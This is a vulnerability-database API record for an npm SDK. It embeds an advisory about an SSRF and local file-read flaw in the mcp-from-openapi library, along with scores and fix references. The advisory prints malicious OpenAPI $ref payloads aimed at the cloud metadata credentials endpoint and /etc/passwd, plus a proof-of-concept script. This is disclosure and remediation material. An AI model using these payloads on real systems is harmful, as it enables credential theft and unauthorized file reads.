Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/1015600?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/1015600?format=api", "purl": "pkg:npm/%40frontmcp/sdk@0.6.1", "type": "npm", "namespace": "@frontmcp", "name": "sdk", "version": "0.6.1", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "1.0.4", "latest_non_vulnerable_version": "1.0.4", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89293?format=api", "vulnerability_id": "VCID-nsxj-rt5a-tfan", "summary": "mcp-from-openapi is Vulnerable to SSRF via $ref Dereferencing in Untrusted OpenAPI Specifications\n## Summary\n\nThe `mcp-from-openapi` library uses `@apidevtools/json-schema-ref-parser` to dereference `$ref` pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing `$ref` values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during the `initialize()` call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications.\n\n\n## Affected Versions\n\n`<= 2.1.2` (latest)\n\n## CWE\n\nCWE-918: Server-Side Request Forgery (SSRF)\n\n## Vulnerability Details\n\n**File:** `index.js` lines 870-875\n\nWhen `OpenAPIToolGenerator.initialize()` is called, it dereferences the OpenAPI document using `json-schema-ref-parser`:\n\n```javascript\nthis.dereferencedDocument = await import_json_schema_ref_parser.default.dereference(\n JSON.parse(JSON.stringify(this.document))\n);\n```\n\nNo options are passed to `.dereference()` — no URL allowlist, no custom resolvers, no protocol restrictions. The ref parser fetches any URL it encounters in `$ref` values, including:\n\n- `http://` and `https://` URLs (internal services, cloud metadata)\n- `file://` URLs (local filesystem)\n\nThis is the default behavior of `json-schema-ref-parser` — it resolves all `$ref` pointers by fetching the referenced resource.\n\n## Exploitation\n\n### Attack 1: SSRF to internal services / cloud metadata\n\nA malicious OpenAPI spec containing:\n\n```json\n{\n \"openapi\": \"3.0.0\",\n \"info\": { \"title\": \"Evil API\", \"version\": \"1.0\" },\n \"paths\": {\n \"/test\": {\n \"get\": {\n \"operationId\": \"getTest\",\n \"summary\": \"test\",\n \"responses\": {\n \"200\": {\n \"description\": \"OK\",\n \"content\": {\n \"application/json\": {\n \"schema\": {\n \"$ref\": \"http://169.254.169.254/latest/meta-data/iam/security-credentials/\"\n }\n }\n }\n }\n }\n }\n }\n }\n}\n```\n\nWhen processed by `OpenAPIToolGenerator`, the library fetches `http://169.254.169.254/latest/meta-data/iam/security-credentials/` from the server, potentially leaking AWS IAM credentials.\n\n### Attack 2: Local file read\n\n```json\n{\n \"$ref\": \"file:///etc/passwd\"\n}\n```\n\nThe ref parser reads local files and includes their contents in the dereferenced output.\n\n## Proof of Concept\n\n```javascript\nconst http = require('http');\nconst { OpenAPIToolGenerator } = require('mcp-from-openapi');\n\n// Start attacker server to prove SSRF\nconst srv = http.createServer((req, res) => {\n console.log(`SSRF HIT: ${req.method} ${req.url}`);\n res.writeHead(200, {'Content-Type': 'application/json'});\n res.end('{\"type\":\"string\"}');\n});\n\nsrv.listen(9997, async () => {\n const spec = {\n openapi: '3.0.0',\n info: { title: 'Evil', version: '1.0' },\n paths: {\n '/test': {\n get: {\n operationId: 'getTest',\n summary: 'test',\n responses: {\n '200': {\n description: 'OK',\n content: {\n 'application/json': {\n schema: { '$ref': 'http://127.0.0.1:9997/ssrf-proof' }\n }\n }\n }\n }\n }\n }\n }\n };\n\n const gen = new OpenAPIToolGenerator(spec, { validate: false });\n await gen.initialize();\n // Output: \"SSRF HIT: GET /ssrf-proof\"\n // The library fetched our attacker URL during $ref dereferencing.\n\n srv.close();\n});\n```\n\n**Tested and confirmed** on mcp-from-openapi v2.1.2. The attacker server receives the GET request during `initialize()`.\n\n## Impact\n\n- **Cloud credential theft** — `$ref` pointing to `http://169.254.169.254/` steals AWS/GCP/Azure metadata\n- **Internal network scanning** — `$ref` values can probe internal services and ports\n- **Local file read** — `file://` protocol reads arbitrary files from the server filesystem\n- **No privileges required** — attacker only needs to provide a crafted OpenAPI spec to any application using this library\n\n## Suggested Fix\n\nPass resolver options to `dereference()` that restrict which protocols and hosts are allowed:\n\n```javascript\nthis.dereferencedDocument = await $RefParser.dereference(\n JSON.parse(JSON.stringify(this.document)),\n {\n resolve: {\n file: false, // Disable file:// protocol\n http: {\n // Only allow same-origin or explicitly allowed hosts\n headers: this.options.headers,\n timeout: this.options.timeout,\n }\n }\n }\n);\n```\n\nOr disable all external resolution and require all schemas to be inline:\n\n```javascript\nthis.dereferencedDocument = await $RefParser.dereference(\n JSON.parse(JSON.stringify(this.document)),\n {\n resolve: { file: false, http: false, https: false }\n }\n);\n```", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39885", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19386", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19293", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.1927", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19341", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19391", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39885" }, { "reference_url": "https://github.com/agentfront/frontmcp", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/agentfront/frontmcp" }, { "reference_url": "https://github.com/agentfront/frontmcp/releases/tag/v1.0.4", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T14:53:12Z/" } ], "url": "https://github.com/agentfront/frontmcp/releases/tag/v1.0.4" }, { "reference_url": "https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T14:53:12Z/" } ], "url": "https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39885", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39885" }, { "reference_url": "https://github.com/advisories/GHSA-v6ph-xcq9-qxxj", "reference_id": "GHSA-v6ph-xcq9-qxxj", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-v6ph-xcq9-qxxj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110355?format=api", "purl": "pkg:npm/%40frontmcp/sdk@1.0.4", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540frontmcp/sdk@1.0.4" } ], "aliases": [ "CVE-2026-39885", "GHSA-v6ph-xcq9-qxxj" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nsxj-rt5a-tfan" } ], "fixing_vulnerabilities": [], "risk_score": "4.0", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540frontmcp/sdk@0.6.1" }